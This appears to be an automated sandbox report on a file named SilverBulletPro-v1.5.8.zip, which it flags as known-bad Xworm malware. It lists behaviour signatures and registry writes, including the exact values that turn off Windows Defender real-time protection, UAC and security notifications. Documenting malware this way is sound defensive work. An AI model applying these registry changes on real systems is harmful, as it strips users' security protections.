Analysis Overview
SHA256
ef0250d8bd2afdd636bcdca3e55d135c15f18d1c18cad6502e1e58f352ad09cf
Threat Level: Known bad
The file SilverBulletPro-v1.5.8.zip was found to be: Known bad.
Malicious Activity Summary
UAC bypass
Detect Xworm Payload
Modifies firewall policy service
Windows security bypass
Modifies Windows Defender Real-time Protection settings
Xworm
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Modifies system executable filetype association
Loads dropped DLL
Registers COM server for autorun
Drops startup file
Drops desktop.ini file(s)
Adds Run key to start application
Checks installed software on the system
Suspicious use of SetThreadContext
Checks system information in the registry
Enumerates physical storage devices
Unsigned PE
Modifies registry class
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Modifies Internet Explorer settings
Suspicious use of AdjustPrivilegeToken
Delays execution with timeout.exe
Kills process with taskkill
Runs .reg file with regedit
Modifies data under HKEY_USERS
Suspicious use of SetWindowsHookEx
Uses Volume Shadow Copy service COM API
Suspicious use of FindShellTrayWindow
Checks processor information in registry
Suspicious behavior: AddClipboardFormatListener
Suspicious use of SendNotifyMessage
Suspicious behavior: GetForegroundWindowSpam
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-09 22:06
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:40
Platform
win11-20240426-en
Max time kernel
82s
Max time network
96s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Plugins\SilverBulletPro.Win.Plugin.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral13
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:41
Platform
win11-20240508-en
Max time kernel
138s
Max time network
155s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\bin\SilverBulletPro.PluginFramework.pdb
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 52.111.229.19:443 | tcp | |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
Files
Analysis: behavioral16
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:41
Platform
win11-20240426-en
Max time kernel
82s
Max time network
98s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\bin\TesserNet.pdb
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral18
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:40
Platform
win11-20240426-en
Max time kernel
141s
Max time network
156s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\bin\Wpf.Ui.pdb
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:41
Platform
win11-20240508-en
Max time kernel
127s
Max time network
160s
Command Line
Signatures
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableIOAVProtection = "0" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableBehaviorMonitoring = "0" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideRealtimeScanDirection = "0" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableRealtimeMonitoring = "0" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableInformationProtectionControl = "1" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\RealtimeScanDirection = "2" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\IOAVMaxSize = "1298" | C:\Windows\regedit.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableIOAVProtection = "0" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideRealtimeScanDirection = "0" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIntrusionPreventionSystem = "1" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableOnAccessProtection = "0" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableBehaviorMonitoring = "0" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableRealtimeMonitoring = "0" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\IOAVMaxSize = "1298" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableInformationProtectionControl = "1" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableOnAccessProtection = "0" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableIntrusionPreventionSystem = "0" | C:\Windows\regedit.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableIntrusionPreventionSystem = "0" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\RealtimeScanDirection = "2" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIntrusionPreventionSystem = "1" | C:\Windows\regedit.exe | N/A |
Modifies firewall policy service
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Static\System | C:\Windows\regedit.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System | C:\Windows\regedit.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Static\System | C:\Windows\regedit.exe | N/A |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "3" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Windows\regedit.exe | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\regedit.exe | N/A |
Executes dropped EXE
Registers COM server for autorun
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{05F3561D-0358-4687-8ACD-A34D24C488DF}\InProcServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{01afc156-f2eb-4c1c-a722-8550417d396f}\InProcServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{a3b3c46c-05d8-429b-bf66-87068b4ce563}\InProcServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\InProcServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F56F6FDD-AA9D-4618-A949-C1B91AF43B1A}\InProcServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E48B2549-D510-4A76-8A5F-FC126A6215F0}\InprocServer32 | C:\Windows\regedit.exe | N/A |
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\ImmutableMuiCache\Strings | C:\Windows\regedit.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\AutoEndTasks = "1" | C:\Windows\regedit.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Security Health\State\Disabled = "1" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
